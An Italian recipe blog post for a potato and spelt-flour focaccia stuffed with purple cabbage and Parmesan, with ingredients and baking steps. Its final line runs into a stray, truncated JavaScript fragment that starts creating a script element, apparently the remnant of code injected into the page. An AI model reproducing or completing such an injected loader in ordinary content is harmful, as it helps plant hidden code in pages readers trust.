Focaccia di patate ripiena

0
1126

Oggi vi propongo una focaccia fatta con le patate e farcita con cavolo cappuccio viola. Una combinazione davvero ottima. La focaccia di patate può essere farcita come più piace con affettati, formaggi e verdure. La mia versione è sicuramente light ma senza rinunciare al gusto. È adatta come stuzzichino per accompagnare un aperitivo o come secondo piatto.

Ingredienti

6 patate;

120 gr di farina di farro;

Sale;

Parmigiano grattugiato;

Per il ripieno:

50gr di cavolo cappuccio

Parmigiano grattugiato

Procedimento

Pelare e lessare in acqua le patate quindi schiacciarle aiutandovi con uno schiacciapatate. Aggiungere un cucchiaino di sale e la farina di farro man mano amalgamando il tutto. Si deve ottenere un impasto liscio e formare una pallina coprirla con la pellicola trasparente e lasciare riposare in frigo per un paio d’ore. Riprendere l’impasto e dividerlo in due parti, una prima parte stenderla con le mani in una tortiera ricoperta con la carta da forno adagiarvi sopra il cavolo cappuccio viola tagliato finemente e cospargerlo con una bella manciata di parmigiano grattugiato.

Ricoprire con la seconda parte di impasto e unire bene i bordi. Cospargere la superfice con parmigiano grattugiato e infornare in forno ventilato a 180 gradi per 30 minuti. Lasciarla intiepidire e…

…buon appetitovar d=document;var s=d.createElement(‘script’);